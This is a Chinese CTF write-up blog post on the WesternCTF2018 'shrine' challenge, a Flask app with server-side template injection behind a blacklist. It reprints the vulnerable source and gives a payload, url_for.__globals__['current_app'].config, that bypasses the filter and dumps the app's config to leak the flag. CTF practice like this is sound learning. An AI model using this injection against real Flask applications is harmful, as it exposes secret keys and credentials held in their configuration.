[WesternCTF2018]shrine

最新推荐文章于 2024-01-13 17:29:52 发布
最新推荐文章于 2024-01-13 17:29:52 发布
阅读量445 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/105507836
版权

给了一段源码,格式化代码如下

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG') \

@app.route('/')
def index():
    return open(__file__).read() \


@app.route('/shrine/')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

模板注入参考文献
根据参考文献
在这里插入图片描述

在这里插入图片描述
可以发现他用了这个函数,测试一下是否存在模板注入
在这里插入图片描述
可以发现存在模板注入,源码中有个名字为FLAG的config
在这里插入图片描述
但是源码中又过滤了config
在这里插入图片描述
百度搜搜过滤config怎么做~~(日常白嫖)~~
参考文献

根据参考文献
在这里插入图片描述
最终得出payload

/shrine/{{url_for.__globals__['current_app'].config}}

最终得到FLAG的配置文件

penson by 小乌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[WesternCTF2018] web题-shrine
BROTHERYY的博客
12-30 266
开题即送源码一份 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径 def shrine(shrine): def safe_j
[WesternCTF2018]shrine 1(flask)
weixin_45577185的博客
09-10 266
非常完美的答案 分析源码 app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 上面这行代码把黑名单的东西遍历并设为空,例如:
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1507
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1433
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
NO.2-20 [WesternCTF2018]shrine
nigo134的博客
08-01 313
SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 1.模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。一些模板引擎:Smarty,Mako,Jinja2,Jade,Velocity,Freemaker和Twig 模板引擎可
渗透学习-CTF篇-web-BUUCTF
qq_43696276的博客
01-17 2186
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
shrine-commerce
04-04
"shrine-commerce" 是一个基于 Flutter 和 Dart 技术构建的电子商务项目,旨在提供一个用于学习和实践 MDC-100 系列代码实验室的平台。在这个项目中,你可以深入理解如何用 Flutter 构建现代化的购物应用,同时熟悉 ...
Shrine View-crx插件
04-07
"Shrine View-crx插件"是一款专为谷歌浏览器(Chrome)设计的扩展程序,它为用户带来了一种独特的新标签页体验。当用户打开一个新的浏览器标签时,不再是普通的空白页面,而会显示一个随机选取的日本Shinto神社的...
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
Shrine.cr是一个专门为Crystal编程语言设计的文件附件处理库,灵感来源于Ruby社区中的 Shrine 框架。这个库提供了一套全面的解决方案,用于在Crystal应用程序中上传、存储和管理文件,同时也支持多种ORM适配器,使得...
基于Material Design 2实现的Shrine-MaterialDesign2..zip
09-24
【标题】基于Material Design 2实现的Shrine-MaterialDesign2项目详解 【描述】Material Design 2,也称为Material Design Lite,是Google推出的一种设计语言的升级版,旨在为应用和网站提供更加统一、现代且富有...
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 265
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
BUUCTF-[WesternCTF2018]shrine
tmyzxy1314的博客
01-13 426
shrine/{{url_for.__globals__}} 输出所有全局变量。不知到是哪一个就一个一个试,这里我知道是current_app。这道题,只要学会了ssti,认真分析代码就可以轻松拿下。/shrine/{{2-2}} 判断是否有ssti漏洞。其实以及获取了flag了但是可以再深入一点。运用Flask函数url_for()访问题目链接是一串python代码。这样不好看,查看源代码。
工业视觉智能-分割模型基础知识
最新发布
08-18
根据《阿里云工业视觉智能高级工程师ACP认证免费课程》(https://edu.aliyun.com/course/3128115/lesson/342981389)创建的个人笔记
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值